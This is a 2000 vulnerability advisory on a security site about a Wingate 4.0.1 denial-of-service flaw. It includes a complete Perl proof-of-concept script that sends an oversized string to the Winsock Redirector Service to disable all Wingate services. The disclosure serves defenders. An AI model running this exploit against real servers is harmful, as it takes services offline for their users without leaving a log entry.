Advisories : Wingate 4.0.1 Vulnerability

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : Wingate 4.0.1 Vulnerability

Title:	Wingate 4.0.1 Vulnerability
Released by:	Blue Panda
Date:	2nd October 2000
Printable version:	Click here

=================================================================

Blue Panda Vulnerability Announcement: Wingate 4.0.1

02/10/2000 (dd/mm/yyyy)



bluepanda@dwarf.box.sk

http://bluepanda.box.sk/

=================================================================



Problem: The Wingate engine can be disabled by sending an abnormal string to

the Winsock Redirecter Service. The attack is not logged.



Vulnerable: Wingate Home/Standard/Pro 4.0.1, possible prior versions

(untested).



Immune: Wingate 4.1 Beta A



Vendor status: Notified.



===================

Proof of concept:

===================



#!/usr/bin/perl

#

# wgate401.pl - Wingate 4.0.1 denial-of-service

# Blue Panda - bluepanda@dwarf.box.sk

# http://bluepanda.box.sk/

#

# ----------------------------------------------------------

# Disclaimer: this file is intended as proof of concept, and

# is not intended to be used for illegal purposes. I accept

# no responsibility for damage incurred by the use of it.

# ----------------------------------------------------------

#

# Causes all Wingate services to become unavailable until the Wingate Engine

# is restarted. The Winsock Redirector Service must be enabled in order for

# this to work. Tested on the evaluation version of Wingate Pro 4.0.1.

#



use IO::Socket;



$host = "host.com";

$port = "2080";

$sleepfor = 1;



print "Wingate 4.0.1 denial-of-service

Blue Panda - bluepanda\@dwarf.box.sk

http://bluepanda.box.sk/



----------------------------------------------------------

Disclaimer: this file is intended as proof of concept, and

is not intended to be used for illegal purposes. I accept

no responsibility for damage incurred by the use of it.

----------------------------------------------------------



Causes all Wingate services to become unavailable until the Wingate Engine

is restarted. The Winsock Redirector Service must be enabled in order for

this to work.\n\n";



# Connect to the Winsock Redirector Service.

print "Connecting to $host:$port...";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";

print "done.\n";



# Send some characters to the Winsock Redirector Service.

$buffer = "a" x 1079;

print $socket "$buffer";



# Wait a few seconds.

$counter = 0;

print "Sleeping for $sleepfor seconds.";

while($counter < $sleepfor) {

        sleep(1);

        print ".";

        $counter += 1;

}

print "\n";



# Close the connection. The Winsock Redirector Service should now be

# disabled.

close($socket);



# Connect once more to the Winsock Redirector Service. This will disable all

# other services.

print "Connecting to $host:$port...";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";

print "done.\n";



# Finished.

close($socket);